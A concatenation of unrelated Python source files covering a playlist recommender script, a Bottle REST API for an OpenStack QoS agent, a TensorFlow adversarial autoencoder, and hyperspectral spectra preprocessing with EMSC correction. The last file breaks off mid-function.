print(DemoEnum.tostring(DemoEnum.read(io.BytesIO(b'\x02'))))
print(DemoEnum.table())
print(Encode.item_vec(Encode.u16, DemoEnum.encode, [1, 2, 3, 5]))
|
# -*- coding: utf-8 -*-
#
# Licensed under the terms of the BSD 3-Clause or the CeCILL-B License
# (see codraft/__init__.py for details)
"""
CodraFT, the Codra Filtering Tool
Simple signal and image processing application based on guiqwt and guidata
Starter
"""
from codraft.app import run
run()
|
from fast_import import *
import sys
arg = sys.argv[1:]
#arg = ['offline']
mode = arg[0]
save = True
filename = mode+'_npz/'+'cb_al_'+mode+'.npz'
if len(arg)>1: eurm_k= int(arg[1])
else: eurm_k = 750
configs =[
{'cat':2, 'alpha':1, 'beta':0, 'k':60, 'shrink':0,'threshold':0 },
{'cat':3, 'alpha':0.75, 'beta':0, 'k':50, 'shrink':0,'threshold':0 },
{'cat':4, 'alpha':0.7, 'beta':0, 'k':80, 'shrink':0,'threshold':0 },
{'cat':5, 'alpha':1, 'beta':0, 'k':70, 'shrink':0,'threshold':0 },
{'cat':6, 'alpha':1, 'beta':0, 'k':60, 'shrink':0,'threshold':0 },
{'cat':7, 'alpha':1, 'beta':0, 'k':50, 'shrink':0,'threshold':0 },
{'cat':8, 'alpha':0.7, 'beta':0, 'k':65, 'shrink':0,'threshold':0 },
{'cat':9, 'alpha':0.8, 'beta':0, 'k':65, 'shrink':0,'threshold':0 },
{'cat':10,'alpha':0.8, 'beta':0, 'k':50, 'shrink':0,'threshold':0 },
]
#common part
dr = Datareader(mode=mode, only_load=True, verbose=False)
urm = sp.csr_matrix(dr.get_urm(),dtype=np.float)
icm = dr.get_icm(arid=False,alid=True)
rec = CB_AL_BM25(urm=urm, icm=icm, binary=True, datareader=dr, mode=mode, verbose=True, verbose_evaluation= False)
eurm = sp.csr_matrix(urm.shape)
for c in configs:
pids = dr.get_test_pids(cat=c['cat'])
rec.model(alpha=c['alpha'], k=c['k'], shrink=c['shrink'], threshold=c['threshold'])
rec.recommend(target_pids=pids, eurm_k=eurm_k)
rec.clear_similarity()
eurm = eurm + rec.eurm
rec.clear_eurm()
pids = dr.get_test_pids()
eurm = eurm[pids]
if mode=='offline':
rec_list = post.eurm_to_recommendation_list(eurm=eurm, datareader=dr, remove_seed=True, verbose=False)
mean, full = rec.ev.evaluate(rec_list, str(rec) , verbose=True, return_result='all')
if save:
sp.save_npz(filename ,eurm)
|
# Copyright 2015 Technische Universitaet Berlin
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import logging
from bottle import Bottle, response, request
from core.agent import Agent as CMAgent
__author__ = 'beb'
"""
# Private error methods
"""
def bad_request(param):
response.body = param
response.status = 400
response.content_type = 'application/json'
return response
def internal_error(message):
response.body = message
response.status = 500
response.content_type = 'application/json'
return response
def not_found(message):
response.body = message
response.status = 404
response.content_type = 'application/json'
return response
def encode_dict_json(data_dict):
data_json = json.dumps(data_dict)
return data_json
"""
# ReST API
"""
class Application:
def __init__(self, host, port):
self._host = host
self._port = port
self._app = Bottle()
self._route()
self._debug = True
self.agent = CMAgent()
def _route(self):
# Welcome Screen
self._app.route('/', method="GET", callback=self._welcome)
# Hypervisor methods
self._app.route('/hosts', method="GET", callback=self._hosts_list)
# QoS methods
self._app.route('/qoses', method=["POST", "OPTIONS"], callback=self._qoses_set)
def start(self):
self._app.run(host=self._host, port=self._port)
def _welcome(self):
response.body = "Welcome to the Connectivity Manager Agent"
response.status = 200
return response
def _hosts_list(self):
"""
List all OpenStack hypervisors with runtime details
"""
agent = CMAgent()
hypervisors = agent.list_hypervisors()
response.body = encode_dict_json(hypervisors)
logging.debug('Hypervisor list response', response.body)
response.status = 200
response.content_type = 'application/json'
return response
def _qoses_set(self):
"""
Set QoS for VMs
"""
qos_json = request.body.getvalue()
logging.debug('QoS JSON is: %s', qos_json)
if not qos_json:
return bad_request('This POST methods requires a valid JSON')
try:
set_qos = self.agent.set_qos(qos_json)
except Exception, exc:
logging.error(exc.message)
return internal_error(exc.message)
response.status = 200
response.body = encode_dict_json(set_qos)
logging.debug('QoS processed: %s', response.body)
return response
if __name__ == '__main__':
logging.basicConfig(format='%(asctime)s_%(process)d:%(lineno)d [%(levelname)s] %(message)s',level=logging.INFO)
server = Application(host='0.0.0.0', port=8091)
print('Connectivity Manager Agent serving on port 8091...')
server.start()
|
import numpy as np
import typing
import time
import tensorflow as tf
# convenient abbreviations
tfk = tf.keras
tfka = tfk.activations
tfkl = tf.keras.layers
# adversarial convolutional autoencoder
class AAE(object):
def __init__(self,
latent_dim: int, # latent dimension of style vector
num_label: int, # number of possible labels
feature_shape: typing.Tuple[int, int, int], # x-y-channel
MNIST: bool=False, # test flag
):
# initiation of the superclass of CVAE, ie. tf.keras.Model
super().__init__()
# set attributes
self.latent_dim = latent_dim
self.num_label = num_label
self.feature_shape = feature_shape
# download VGG19 first two convolution layers
print('downloading VGG19...')
vgg_model = tfk.applications.vgg19.VGG19(include_top=False, weights='imagenet')
# TODO: pseudo-coloring: 1x1 conv layers, trainable, 30->10->3
# define convolutional layers
forward_layers = []
backward_layers = []
x_shrink_factor = 1
y_shrink_factor = 1
if MNIST:
layers = vgg_model.layers[1:7]
else:
layers = vgg_model.layers[1:]
print('parsing VGG19...')
for layer in layers: # skip original input layer
if isinstance(layer, tfkl.Conv2D):
new_forward_layer = tfkl.Conv2D(
filters=layer.filters,
kernel_size=layer.kernel_size,
strides=layer.strides,
padding=layer.padding,
activation=layer.activation,
)
new_backward_layer = tfkl.Conv2DTranspose(
filters=layer.filters,
kernel_size=layer.kernel_size,
strides=layer.strides,
padding=layer.padding,
activation=layer.activation,
)
elif isinstance(layer, tfkl.MaxPool2D):
new_forward_layer = tfkl.MaxPool2D(
pool_size=layer.pool_size,
strides=layer.strides,
padding=layer.padding,
)
new_backward_layer = tfkl.UpSampling2D(
size=layer.pool_size,
)
else:
raise ValueError('unrecognized layer in VGG19 {}'.format(type(layer)))
forward_layers.append(new_forward_layer)
backward_layers.insert(0, new_backward_layer)
x_shrink_factor *= layer.strides[0]
y_shrink_factor *= layer.strides[1]
# define params
deconv_shape = (
int(feature_shape[0]/x_shrink_factor),
int(feature_shape[1]/y_shrink_factor),
int(forward_layers[-2].filters),
)
reconstruct_filter = feature_shape[2]
reconstruct_kernel_size = (3, 3)
reconstruct_strides = (1, 1)
# define networks
print('building networks...')
self.inference_net = tfk.Sequential(
[tfkl.InputLayer(input_shape=feature_shape)]\
+ forward_layers\
+ [tfkl.Flatten()]\
+ [tfkl.Dense(units=latent_dim+num_label)])
self.generation_net = tfk.Sequential(
[tfkl.InputLayer(input_shape=(latent_dim+num_label,))]\
+ [tfkl.Dense(
units=deconv_shape[0]*deconv_shape[1]*deconv_shape[2],
activation=tfka.relu)]\
+ [tfkl.Reshape(target_shape=deconv_shape)]\
+ backward_layers\
+ [tfkl.Conv2DTranspose( # final deconvolution layer
filters=reconstruct_filter,
kernel_size=reconstruct_kernel_size,
strides=reconstruct_strides,
padding='same',
activation=tfka.sigmoid)])
self.regularization_net = tfk.Sequential(
[tfkl.InputLayer(input_shape=(latent_dim,))]\
+ [tfkl.Dense(units=32, activation=tfka.relu)]\
+ [tfkl.Dense(units=64, activation=tfka.relu)]\
+ [tfkl.Dense(units=2, activation=tfka.softmax)])
self.classification_net = tfk.Sequential(
[tfkl.InputLayer(input_shape=(num_label,))]\
+ [tfkl.Dense(units=32, activation=tfka.relu)]\
+ [tfkl.Dense(units=64, activation=tfka.relu)]\
+ [tfkl.Dense(units=2, activation=tfka.softmax)])
# set weight and none-trainable
# note: new model layers count skips InputLayer
print('copying weights from VGG19...')
for index in range(1, 1+len(forward_layers)):
if isinstance(vgg_model.layers[index], tfkl.Conv2D):
self.inference_net.layers[index-1].set_weights(vgg_model.layers[index].get_weights())
self.inference_net.layers[index-1].trainable = False
def infer(self, x):
vector_pred = self.inference_net(x)
z_pred, y_pred_logit = tf.split(vector_pred, [self.latent_dim, self.num_label], axis=1)
y_pred = tfka.softmax(y_pred_logit)
return z_pred, y_pred
def generate(self, z_pred, y_pred):
vector_pred = tf.concat([z_pred, y_pred], axis=1)
return self.generation_net(vector_pred)
def regularize(self, z_pred):
N = z_pred.shape[0]
normal_sample = tf.random.normal(
shape=z_pred.shape,
mean=0.0,
stddev=1.0,
)
positive_pred = self.regularization_net(normal_sample)
negative_pred = self.regularization_net(z_pred)
positive_label = tf.one_hot(tf.ones([N], dtype=tf.int32), depth=2)
negative_label = tf.one_hot(tf.zeros([N], dtype=tf.int32), depth=2)
discrimination_loss = tfk.losses.categorical_crossentropy(positive_label, positive_pred)\
+ tfk.losses.categorical_crossentropy(negative_label, negative_pred)
confusion_loss = tfk.losses.categorical_crossentropy(positive_label, negative_pred)\
+ tfk.losses.categorical_crossentropy(negative_label, positive_pred)
return discrimination_loss, confusion_loss
def classify(self, y_pred):
N = y_pred.shape[0]
categorical_sample = tf.random.categorical(
logits=tf.math.log(y_pred),
num_samples=1, # per row
)
onehot_sample = tf.one_hot(categorical_sample, depth=self.num_label)
positive_pred = self.classification_net(onehot_sample)
negative_pred = self.classification_net(y_pred)
positive_label = tf.one_hot(tf.ones([N], dtype=tf.int32), depth=2)
negative_label = tf.one_hot(tf.zeros([N], dtype=tf.int32), depth=2)
discrimination_loss = tfk.losses.categorical_crossentropy(positive_label, positive_pred)\
+ tfk.losses.categorical_crossentropy(negative_label, negative_pred)
confusion_loss = tfk.losses.categorical_crossentropy(positive_label, negative_pred)\
+ tfk.losses.categorical_crossentropy(negative_label, positive_pred)
return discrimination_loss, confusion_loss
def compute_loss(self, x, context):
N = x.shape[0]
z_pred, y_pred = self.infer(x)
x_pred = self.generate(z_pred, y_pred)
reconstruction_loss = tfk.losses.MSE(x, x_pred)
if context == 'reconstruction':
return reconstruction_loss
regularization_loss = self.regularize(z_pred)
classification_loss = self.classify(y_pred)
discrimination_loss = regularization_loss[0] + classification_loss[0]
confusion_loss = regularization_loss[1] + classification_loss[1]
if context == 'discrimination':
return discrimination_loss
elif context == 'confusion':
return confusion_loss
elif context == 'evaluation':
return reconstruction_loss, discrimination_loss, confusion_loss
def compute_apply_gradients(self, x, context, optimizer_dict):
if context == 'reconstruction':
var_list = self.inference_net.trainable_variables + self.generation_net.trainable_variables
optimizer_dict[context].minimize(
loss=lambda: self.compute_loss(x, context=context),
var_list=var_list,
)
elif context == 'discrimination':
var_list =self.regularization_net.trainable_variables\
+ self.classification_net.trainable_variables
optimizer_dict[context].minimize(
loss=lambda: self.compute_loss(x, context=context),
var_list=var_list,
)
elif context == 'confusion':
var_list = self.inference_net.trainable_variables
optimizer_dict[context].minimize(
loss=lambda: self.compute_loss(x, context=context),
var_list=var_list,
)
|
''' This submodule provides basic preprocessing functionality to work with hyperspectral data/images.
E.g.
- Normalization
- Baseline Correction/Removal
- RGB-Image standardization
- Scatter correction (especially RMieS-correction)
- Data transformations from 3D to 2D and reverse
- ...
'''
# IMPORTS
#########
import numpy as np
# FUNCTIONS
###########
def _baseline_corr(data, lam=1000, p=0.05, n_iter=10):
''' Asymmetric least squares smoothing for baseline removal/correction.
Adapted from Eilers and Boelens (2005) and with optimized memory usage.
Two parameters: lam (lambda) for smoothness and p for asymmetry.
Generally for data with positive peaks 0.001 <= p <= 0.1 is a good choice and 10^2 <= lam <= 10^9
Although iteration number is fixed at 10 your mileage may vary if the weights do not converge in this time.
Returns the baseline corrected data.
'''
from scipy import sparse
from scipy.sparse.linalg import spsolve
data_length = len(data)
D = sparse.diags([1, -2, 1], [0, -1, -2], shape=(data_length, data_length - 2))
D = lam * D.dot(D.T)
weights = np.ones(data_length)
W = sparse.spdiags(weights, 0, data_length, data_length)
for i in range(n_iter):
W.setdiag(weights)
Z = W + D
z = spsolve(Z, weights * data)
weights = p * (data > z) + (1 - p) * (data < z)
return z
def baseline_als(data, lam=1000, p=0.05, n_iter=10):
'''Checks input data shape. If it's a single spectrum defaults to calling subfunction _baseline_corr. Otherwise loops through the data of shape (number of spectra, data points) and applies correction to each spectrum.
Returns the baseline corrected data as a numpy array.
'''
if len(data.shape) == 1:
result = np.array(_baseline_corr(data, lam, p, n_iter))
return result
elif len(data.shape) == 2:
result = np.array([_baseline_corr(i, lam, p, n_iter) for i in data])
return result
else:
print(
'Data shape error! Please check your input values accordingly. Desired shape of (number of spectra, data points)')
# ---------------------------------------------------------------------------
# AS IMPLEMENTED BY SHUXIA GUO DURING THE INITIAL HACKATHON
# ---------------------------------------------------------------------------
from typing import Union as U, Tuple as T, Optional
from sklearn.decomposition import PCA
from sklearn.model_selection import LeaveOneGroupOut
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.metrics import confusion_matrix
import numpy as np
def emsc(spectra: np.ndarray,
wavenumbers: np.ndarray,
poly_order: Optional[int] = 2,
reference: np.ndarray = None,
constituents: np.ndarray = None,
use_reference: bool = True,
return_coefs: bool = False) -> U[np.ndarray, T[np.ndarray, np.ndarray]]:
"""
Preprocess all spectra with EMSC
:param spectra: ndarray of shape [n_samples, n_channels]
:param wavenumbers: ndarray of shape [n_channels]
:param poly_order: order of polynomial
None: EMSC without polynomial components
:param reference: reference spectrum
None: use average spectrum as reference;
:param constituents: ndarray of shape [n_consituents, n_channels]
Except constituents it can also take orthogonal vectors,
for example from PCA.
:param use_reference: if False not include reference in the model
:param return_coefs: if True returns coefficients
[n_samples, n_coeffs], where n_coeffs = 1 + len(costituents) + (order + 1).
Order of returned coefficients:
1) b*reference + # reference coeff
k) c_0*constituent[0] + ... + c_k*constituent[k] + # constituents coeffs
a_0 + a_1*w + a_2*w^2 + ... # polynomial coeffs
:return: preprocessed spectra, [coefficients]
"""
# assert poly_order >= 0, 'poly_order must be >= 0'
if reference is None:
reference = np.mean(spectra, axis=0)
reference = reference[:, np.newaxis]
half_rng = np.abs(wavenumbers[0] - wavenumbers[-1]) / 2
normalized_wns = (wavenumbers - np.mean(wavenumbers)) / half_rng
if poly_order is None:
if constituents is None:
columns = (reference)
else:
columns = (reference, constituents.T)
else:
polynomial_columns = [np.ones(len(wavenumbers))]
for j in range(1, poly_order + 1):
polynomial_columns.append(normalized_wns ** j)
polynomial_columns = np.stack(polynomial_columns, axis=1)
# spectrum = X*coefs + residues
# least squares -> A = (X.T*X)^-1 * X.T; coefs = A * spectrum
if constituents is None:
columns = (reference, polynomial_columns)
else:
columns = (reference, constituents.T, polynomial_columns)
if not use_reference: columns = columns[1:]
if isinstance(columns, tuple):
X = np.concatenate(columns, axis=1)
else:
X = columns.copy()
A = np.dot(np.linalg.pinv(np.dot(X.T, X)), X.T)
spectra_columns = spectra.T
coefs = np.dot(A, spectra_columns)
residues = spectra_columns - np.dot(X, coefs)
if use_reference:
preprocessed_spectra = residues / coefs[0] + reference
else:
preprocessed_spectra = residues.copy()
if return_coefs:
return preprocessed_spectra.T, coefs.T
return preprocessed_spectra.T
def rep_emsc(spectra: np.ndarray,
wavenumbers: np.ndarray,
replicate: np.ndarray,
poly_order: Optional[int] = 2,
reference: np.ndarray = None,
n_comp: int = 1,
use_reference: bool = True,
return_coefs: bool = False):
"""
Preprocess all spectra with replicate EMSC
:param spectra: ndarray of shape [n_samples, n_channels]
:param wavenumbers: ndarray of shape [n_channels]
:param replicate: ndarray of shape [n_samples]
:param poly_order: order of polynomial
None: EMSC without polynomial components
:param reference: reference spectrum
None: use average spectrum as reference;
:param n_comp: number of principal components used for replicate correction
:param use_reference: if False not include reference in the model
:param return_coefs: if True returns coefficients
[n_samples, n_coeffs], where n_coeffs = 1 + n_comp + (order + 1).
Order of returned coefficients:
1) b*reference + # reference coeff
n) r_0*loading_rep[0] + ... + r_n*loading_rep[n] + # replicate coeffs
a_0 + a_1*w + a_2*w^2 + ... # polynomial coeffs
:return: preprocessed spectra, [coefficients]
"""
constituents = cal_rep_matrix(spectra=spectra,
wavenumbers=wavenumbers,
replicate=replicate,
do_PCA=True,
n_comp=n_comp)[1]
res = emsc(spectra=spectra,
wavenumbers=wavenumbers,
poly_order=poly_order,
reference=reference,
constituents=constituents,
use_reference=use_reference,
return_coefs=return_coefs)
return res
def cal_rep_matrix(spectra: np.ndarray,
wavenumbers: np.ndarray,
replicate: np.ndarray,
do_PCA: bool = False,
n_comp: int = 1):
"""
Calculate mean spectra for each replicate, and do PCA if required
:param spectra: ndarray of shape [n_samples, n_channels]
:param wavenumbers: ndarray of shape [n_channels]
:param replicate: ndarray of shape [n_samples]
:param do_PCA: if True returns loadings from PCA
:param n_comp: number of principal components used for replicate correction
:return: mean spectra of each replicate
"""
n_rep = len(replicate)
n_sample = np.shape(spectra)[0]
assert n_rep == n_sample
rep_mean = []
rep_uni = np.unique(replicate)
#### replace for loop with map ####
rep_mean = list(map(lambda x: np.mean(spectra[replicate == x, :], axis=0), rep_uni))
# for j in range(len(rep_uni)):
# rep_mean.append(np.mean(spectra[replicate==rep_uni[j],:], axis=0))
rep_mean = np.stack(rep_mean, axis=0)
if do_PCA:
n_comp = np.min((n_rep, n_comp))
model_pca = PCA(n_comp)
rep_mean_c = rep_mean - np.mean(rep_mean, axis=0)
rep_columns = model_pca.fit(rep_mean_c).components_
return rep_mean, rep_columns
else:
return rep_mean
def cal_merit_lda(spectra: np.ndarray,
wavenumbers: np.ndarray,
replicate: np.ndarray,
label: np.ndarray):
"""
Benchmark of replicate EMSC correction based on LDA classification
:param spectra: ndarray of shape [n_samples, n_channels]
:param wavenumbers: ndarray of shape [n_channels]
:param replicate: ndarray of shape [n_samples]
:param label: ndarray of shape [n_samples]
:return: mean sensitivity of leave-one-replicate-out cross-validation
"""
logo = LeaveOneGroupOut()
res_true = []
res_pred = []
for train, test in logo.split(spectra, label, groups=replicate):
tmp_model = LinearDiscriminantAnalysis()
tmp_model.fit(spectra[train], label[train])
res_pred = np.append(res_pred, tmp_model.predict(spectra[test]))
res_true = np.append(res_true, label[test])
c_m = confusion_matrix(res_true, res_pred, labels=np.unique(label))
res = np.mean(np.diag(c_m) / np.sum(c_m, axis=1))
return res
def rep_emsc_opt(spectra: np.ndarray,
wavenumbers: np.ndarray,
replicate: np.ndarray,
label: np.ndarray,
poly_order: Optional[int] = 2,
reference: np.ndarray = None,
n_comp_all: np.ndarray = (1, 2, 3),
use_reference: bool = True,
return_coefs: bool = False,
fun_merit=cal_merit_lda,
do_correction: bool = True):
"""
Preprocess all spectra with replicate EMSC, wit automatically optimization of n_comp
:param spectra: ndarray of shape [n_samples, n_channels]
:param wavenumbers: ndarray of shape [n_channels]
:param replicate: ndarray of shape [n_samples]
:param label: ndarray of shape [n_samples]
:param poly_order: order of polynomial
None: EMSC without polynomial components
:param reference: reference spectrum
None: use average spectrum as reference;
:param n_comp_all: calidated number of principal components
used for replicate correction
:param use_reference: if False not include reference in the model
:param return_coefs: if True returns coefficients
[n_samples, n_coeffs], where n_coeffs = 1 + n_comp + (order + 1).
Order of returned coefficients:
1) b*reference + # reference coeff
n) r_0*loading_rep[0] + ... + r_n*loading_rep[n] + # replicate coeffs
a_0 + a_1*w + a_2*w^2 + ... # polynomial coeffs
:param fun_merit: function used to calculate the merits
benchmarking the goodness of replicate correction
:param do_correction: if or not do replicate EMSC correction using optimal n_comp
:return: [preprocessed spectra, [coefficients]], merits, opt_comp
"""
uni_rep = np.unique(replicate)
merits = []
for n_comp in n_comp_all:
if n_comp >= len(uni_rep): break
prep_spectra = rep_emsc(spectra=spectra,
wavenumbers=wavenumbers,
replicate=replicate,
poly_order=poly_order,
reference=reference,
n_comp=n_comp,
use_reference=use_reference,
return_coefs=False)
met = fun_merit(spectra=prep_spectra,
wavenumbers=wavenumbers,
replicate=replicate,
label=label)
merits.append(met)
opt_comp = n_comp_all[np.argmax(merits)]
if do_correction:
res = rep_emsc(spectra=spectra,
wavenumbers=wavenumbers,
replicate=replicate,
poly_order=poly_order,
reference=reference,
n_comp=opt_comp,
use_reference=use_reference,
return_coefs=return_coefs)
return res, merits, opt_comp
else:
return merits, opt_comp
# ---------------------------------------------------------------------------------------------------
# The following Part Is Based On Norway Biospectools
# ---------------------------------------------------------------------------------------------------
import numpy as np
class EmptyCriterionError(Exception):
pass
class BaseStopCriterion:
def __init__(self, max_iter):
self.max_iter = max_iter
self.reset()
def reset(self):
self.best_idx = 0
self.scores = []
self.values = []
def add(self, score, value=None):
self.scores.append(score)
self.values.append(value)
self._update_best(score)
def _update_best(self, score):
if score < self.scores[self.best_idx]:
self.best_idx = len(self.scores) - 1
def __bool__(self):
return self.cur_iter == self.max_iter or bool(self._stop())
@property
def cur_iter(self):
return len(self.scores)
@property
def best_score(self):
if len(self.scores) == 0:
raise EmptyCriterionError('No scores were added')
return self.scores[self.best_idx]
@property
def best_value(self):
if len(self.values) == 0:
raise EmptyCriterionError('No scores were added')
return self.values[self.best_idx]
@property
def best_iter(self):
if len(self.scores) == 0:
raise EmptyCriterionError('No scores were added')
if self.best_idx >= 0:
return self.best_idx + 1
else:
return len(self.scores) - self.best_idx + 1
def _stop(self) -> bool:
return False
class MatlabStopCriterion(BaseStopCriterion):
def __init__(self, max_iter, precision=None):
super().__init__(max_iter)
self.precision = precision
self._eps = np.finfo(float).eps
def _stop(self) -> bool:
if self.cur_iter <= 2:
return False
pp_rmse, p_rmse, rmse = [round(r, self.precision)
for r in self.scores[-3:]]
return rmse > p_rmse or pp_rmse - rmse <= self._eps
class TolStopCriterion(BaseStopCriterion):
def __init__(self, max_iter, tol, patience):
super().__init__(max_iter)
self.tol = tol
self.patience = patience
def _update_best(self, score):
if score + self.tol < self.best_score:
self.best_idx = len(self.scores) - 1
def _stop(self) -> bool:
if self.cur_iter <= self.patience + 1:
return False
no_update_iters = self.cur_iter - self.best_iter
return no_update_iters > self.patience
# ---------------------------------------------------------------------------------------
import logging
from typing import Union as U, Tuple as T, Optional as O
import numpy as np
class EMSCInternals:
"""Class that contains intermediate results of EMSC algorithm.
Parameters
----------
coefs : `(N_samples, 1 + N_constituents + (poly_order + 1) ndarray`
All coefficients for each transformed sample. First column is a
scaling parameter followed by constituent and polynomial coefs.
This is a transposed solution of equation
_model @ coefs.T = spectrum.
scaling_coefs : `(N_samples,) ndarray`
Scaling coefficients (reference to the first column of coefs_).
polynomial_coefs : `(N_samples, poly_order + 1) ndarray`
Coefficients for each polynomial order.
constituents_coefs : `(N_samples, N_constituents) ndarray`
Coefficients for each constituent.
residuals : `(N_samples, K_channels) ndarray`
Chemical residuals that were not fitted by EMSC model.
Raises
------
AttributeError
When polynomial's or constituents' coeffs are not available.
"""
def __init__(
self,
coefs: np.ndarray,
residuals: np.ndarray,
poly_order: O[int],
constituents: O[np.ndarray]):
assert len(coefs.T) == len(residuals), 'Inconsistent number of spectra'
self.coefs = coefs.T
self.residuals = residuals
if constituents is not None:
self._n_constituents = len(constituents)
else:
self._n_constituents = 0
if poly_order is not None:
self._n_polynomials = poly_order
else:
self._n_polynomials = 0
@property
def scaling_coefs(self) -> np.ndarray:
return self.coefs[:, 0]
@property
def constituents_coefs(self) -> np.ndarray:
if self._n_constituents == 0:
raise AttributeError(
'constituents were not set up. '
'Did you forget to call transform?')
return self.coefs[:, 1:1 + self._n_constituents]
@property
def polynomial_coefs(self) -> np.ndarray:
if self._n_polynomials == 0:
raise AttributeError(
'poly_order was not set up. '
'Did you forget to call transform?')
return self.coefs[:, 1 + self._n_constituents:]
class EMSC:
"""Extended multiplicative signal correction (EMSC) [1]_.
Parameters
----------
reference : `(K_channels,) ndarray`
Reference spectrum.
wavenumbers : `(K_channels,) ndarray`, optional
Wavenumbers must be passed if given polynomial order
is greater than zero.
poly_order : `int`, optional (default 2)
Order of polynomial to be used in regression model. If None
then polynomial will be not used.
weights : `(K_channels,) ndarray`, optional
Weights for spectra.
constituents : `(N_constituents, K_channels) np.ndarray`, optional
Chemical constituents for regression model [2]. Can be used to add
orthogonal vectors.
scale : `bool`, default True
If True then spectra will be scaled to reference spectrum.
rebuild_model : `bool`, default True
If True, then model will be built each time transform is called,
this allows to dynamically change parameters of EMSC class.
Otherwise model will be built once (for speed).
Other Parameters
----------------
_model : `(K_channels, 1 + N_constituents + (poly_order + 1) ndarray`
Matrix that is used to solve least squares. First column is a
reference spectrum followed by constituents and polynomial columns.
_norm_wns : `(K_channels,) ndarray`
Normalized wavenumbers to -1, 1 range
References
----------
.. [1] A. Kohler et al. *EMSC: Extended multiplicative
signal correction as a tool for separation and
characterization of physical and chemical
information in fourier transform infrared
microscopy images of cryo-sections of
beef loin.* Applied spectroscopy, 59(6):707–716, 2005.
"""
# TODO: Add numpy typing for array-like objects?
def __init__(
self,
reference,
wavenumbers=None,
poly_order: O[int] = 2,
constituents=None,
weights=None,
scale: bool = True,
rebuild_model: bool = True,
):
self.reference = np.asarray(reference)
self.wavenumbers = wavenumbers
if self.wavenumbers is not None:
self.wavenumbers = np.asarray(wavenumbers)
self.poly_order = poly_order
self.weights = weights
if self.weights is not None:
self.weights = np.asarray(weights)
self.constituents = constituents
if self.constituents is not None:
self.constituents = np.asarray(constituents)
self.scale = scale
self.rebuild_model = rebuild_model
# lazy init during transform
# allows to change dynamically EMSC's parameters
self._model = None
self._norm_wns = None
def transform(
self,
spectra,
internals: bool = False,
check_correlation: bool = True) \
-> U[np.ndarray, T[np.ndarray, EMSCInternals]]:
spectra = np.asarray(spectra)
self._validate_inputs()
if check_correlation:
self._check_high_correlation(spectra)
if self.rebuild_model or self._model is None:
self._norm_wns = self._normalize_wns()
self._model = self._build_model()
coefs = self._solve_lstsq(spectra)
residuals = spectra - np.dot(self._model, coefs).T
scaling = coefs[0]
corr = self.reference + residuals / scaling[:, None]
if not self.scale:
corr *= scaling[:, None]
if internals:
internals_ = EMSCInternals(
coefs, residuals, self.poly_order, self.constituents)
return corr, internals_
return corr
def clear_state(self):
del self._model
del self._norm_wns
def _build_model(self):
columns = [self.reference]
if self.constituents is not None:
columns.extend(self.constituents)
if self.poly_order is not None:
columns.append(np.ones_like(self.reference))
if self.poly_order > 0:
n = self.poly_order + 1
columns.extend(self._norm_wns ** pwr for pwr in range(1, n))
return np.stack(columns, axis=1)
def _solve_lstsq(self, spectra):
if self.weights is None:
return np.linalg.lstsq(self._model, spectra.T, rcond=None)[0]
else:
w = self.weights[:, None]
return np.linalg.lstsq(self._model * w, spectra.T * w, rcond=None)[0]
def _validate_inputs(self):
if (self.poly_order is not None
and self.poly_order < 0):
raise ValueError(
'poly_order must be equal or greater than 0')
if (self.poly_order is not None
and self.poly_order > 0
and self.wavenumbers is None):
raise ValueError(
'wavenumbers must be specified when poly_order is given')
if (self.wavenumbers is not None
and len(self.wavenumbers) != len(self.reference)):
raise ValueError(
"Shape of wavenumbers doesn't match reference spectrum")
def _check_high_correlation(self, spectra):
mean = spectra.mean(axis=0)
score = np.corrcoef(mean, self.reference)[0, 1]
if score < 0.7:
logging.warning(
f'Low pearson score {score:.2f} between mean and reference '
f'spectrum. Make sure that reference spectrum given in '
f'the same order as spectra.')
def _normalize_wns(self):
if self.wavenumbers is None:
return None
half_rng = np.abs(self.wavenumbers[0] - self.wavenumbers[-1]) / 2
return (self.wavenumbers - np.mean(self.wavenumbers)) / half_rng
def emsc(
spectra: np.ndarray,
wavenumbers: np.ndarray,
poly_order: O[int] = 2,
reference: np.ndarray = None,
weights: np.ndarray = None,
constituents: np.ndarray = None,
return_coefs: bool = False,
return_residuals: bool = False) -> U[np.ndarray, T[np.ndarray, np.ndarray],
T[np.ndarray, np.ndarray, np.ndarray]]:
"""Preprocess all spectra with EMSC algorithm [1]_.
Parameters
----------
spectra : `(N_samples, K_channels) np.ndarray`
Spectra to be processed.
wavenumbers : `(K_channels,) ndarray`
Wavenumbers.
poly_order : `int`, optional
Order of polynomial to be used in regression model. If None
then polynomial will be not used. (2, by default)
reference : `(K_channels,) ndarray`, optional
Reference spectrum. If None, then average will be computed.
weights : `(K_channels,) ndarray`, optional
Weights for spectra.
constituents : `(N_constituents, K_channels) np.ndarray`, optional
Chemical constituents for regression model [2]. Can be used to add
orthogonal vectors.
return_coefs : `bool`, optional
Return coefficients.
return_residuals : `bool`, optional
Return residuals.
Returns
-------
preprocessed_spectra : `(N_samples, K_channels) ndarray`
coefficients : `(N_samples, 1 + N_constituents + (poly_order + 1) ndarray`, optional
If ``return_coefs`` is true, then returns coefficients in the
following order:
#. Scaling parametes, b (related to reference spectrum)
#. All constituents parameters in the same order as they given
#. Polynomial coefficients (slope, quadratic effect and so on)
residuals: `(N_samples, K_channels) ndarray`, optional
If ``return_residuals`` is true, then returns residuals
References
----------
.. [1] A. Kohler et al. *EMSC: Extended multiplicative
signal correction as a tool for separation and
characterization of physical and chemical
information in fourier transform infrared
microscopy images of cryo-sections of
beef loin.* Applied spectroscopy, 59(6):707–716, 2005.
"""
assert poly_order is None or poly_order >= 0, 'poly_order must be >= 0'
if reference is None:
reference = np.mean(spectra, axis=0)
# solve for coefs: X @ coefs = spectrum (column)
# (1) build matrix X = [reference constituents polynomial]
columns = [reference]
if constituents is not None:
columns.extend(constituents)
if poly_order is not None:
norm_wns = _normalize_wavenumbers(wavenumbers)
columns.append(np.ones_like(norm_wns))
for j in range(1, poly_order + 1):
columns.append(norm_wns ** j)
X = np.stack(columns, axis=1)
# (2) Calculate coefs
if weights is None:
coefs = np.linalg.lstsq(X, spectra.T, rcond=None)[0]
else:
w = weights[:, None]
coefs = np.linalg.lstsq(X * w, spectra.T * w, rcond=None)[0]
# (3) Preprocessing
residuals = spectra.T - np.dot(X, coefs)
